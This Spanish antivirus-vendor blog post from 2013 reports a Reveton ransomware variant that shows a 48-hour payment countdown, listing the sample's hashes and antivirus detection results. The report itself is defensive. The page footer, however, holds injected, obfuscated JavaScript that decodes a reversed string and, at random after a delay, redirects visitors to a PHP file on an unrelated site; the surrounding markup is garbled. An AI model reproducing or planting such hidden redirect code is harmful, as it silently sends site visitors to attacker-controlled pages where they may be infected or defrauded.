Novedades en la monitorizacion del último REVETON analizado : Tiene contador de 48 horas
Como se sabe, el TROJAN REVETON es un Ransomware (pago por rescate) que pide 300 euros para su eliminación, pero hasta ahora no ponía fecha tope de pago, simplemente incordiaba bloqueando el arranque al presentar una pantalla con falsos mensajes de “la policia” advirtiendo de la imposición de una multa por haber sido vista la IP del ordenador, en determinadas webs pedofilas o prohibidas.
Pues la novedad de hoy, el Reveton que estamos examinando tiene además un contador de 48 horas como tope de dicho pago, amenazando con posteriores consecuencias (indeterminadas) si no se realiza el pago en dicho plazo.
Afortunadamente esta variante ya la controlamos a partir del ELISTARA 26.83 de hoy, si bien lo que hay que temer es lo que haría en el caso de no eliminarlo… Y si bien le sería muy fácil lanzar un formateo de los discos duros o una eliminación de ficheros valiosos, tambien pòdría producir un cifrado de dichos ficheros, al estilo de lo que ya hemos visto en algunos casos que, sin saber qué o quien lo provocaba, eran codificados con cifrado AES256 , u otro alternativo, añadiendo a dichos ficheros las extensionex .BLOCK o .DONE, lo cual, aun eliminando el virus, si dichos ficheros habían sido codificados, codificados quedaban …
De momento vemos que con el ingreso de esta última variante de REVETON, entra en marcha un contador regresivo que empieza en 48 horas y marcha atrás, apareciendo el mensaje de
ESPERANDO PARA EL PAGO 47·57·31, como se ve al fondo del lado derecho de la siguiente imagen:
total de dicha muestra, cazada por el ELISTARA, ofrece el siguiente informe:
SHA256: 356146787abfded69c050e6c1fcb21768ea9209fa5b3348f366707f2fa0df0e5
SHA1: c81a4271eef9a9264c62673bf26f1791a197785a
MD5: 806051ffba4c7e50a1b142b5623de3fd
Tamaño: 205.5 KB ( 210432 bytes )
Nombre: WGSDGSDGDSGSD.EXE.Muestra EliStartPage v26.82
Tipo: Win32 DLL
Detecciones: 27 / 46
Fecha de análisis: 2013-01-08 15:26:56 UTC ( hace 0 minutos )
Antivirus Resultado Actualización
Agnitum – 20130108
AhnLab-V3 Dropper/Win32.Injector 20130108
AntiVir TR/Malagent.A.4623 20130107
Antiy-AVL – 20130108
Avast Win32:Rootkit-gen [Rtk] 20130108
AVG Generic30.CDQG 20130108
BitDefender Gen:Variant.Symmi.8528 20130108
ByteHero – 20130108
CAT-QuickHeal – 20130108
ClamAV – 20130108
Commtouch – 20130108
Comodo UnclassifiedMalware 20130108
DrWeb Trojan.MulDrop4.19664 20130108
Emsisoft – 20130108
eSafe – 20130103
ESET-NOD32 a variant of Win32/Kryptik.ARKD 20130108
F-Prot – 20130108
F-Secure Gen:Variant.Symmi.8528 20130108
Fortinet W32/Injector.GVSV!tr 20130108
GData Gen:Variant.Symmi.8528 20130108
Ikarus Trojan.Win32.Malagent 20130108
Jiangmin – 20121221
K7AntiVirus – 20130107
Kaspersky Trojan-Dropper.Win32.Injector.gvsv 20130108
Kingsoft – 20130107
Malwarebytes Trojan.FakeMS 20130108
McAfee Artemis!806051FFBA4C 20130108
McAfee-GW-Edition Artemis!806051FFBA4C 20130108
Microsoft Trojan:Win32/Malagent 20130108
MicroWorld-eScan Gen:Variant.Symmi.8528 20130108
NANO-Antivirus Trojan.Win32.Injector.beegmq 20130108
Norman W32/Suspicious_Gen4.BXICS 20130108
nProtect – 20130108
Panda Trj/OCJ.B 20130108
PCTools Trojan.Gen 20130108
Rising Suspicious 20130108
Sophos – 20130108
SUPERAntiSpyware – 20130108
Symantec Trojan.Gen.2 20130108
TheHacker – 20130107
TotalDefense – 20130108
TrendMicro TROJ_GEN.RC1CDA1 20130108
TrendMicro-HouseCall TROJ_GEN.RC1CDA1 20130108
VBA32 – 20130108
VIPRE Trojan.Win32.Generic!BT 20130108
ViRobot – 20130108
Dicha version del ELISTARA 26.83 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 8-1-2013
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>ton48horas.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.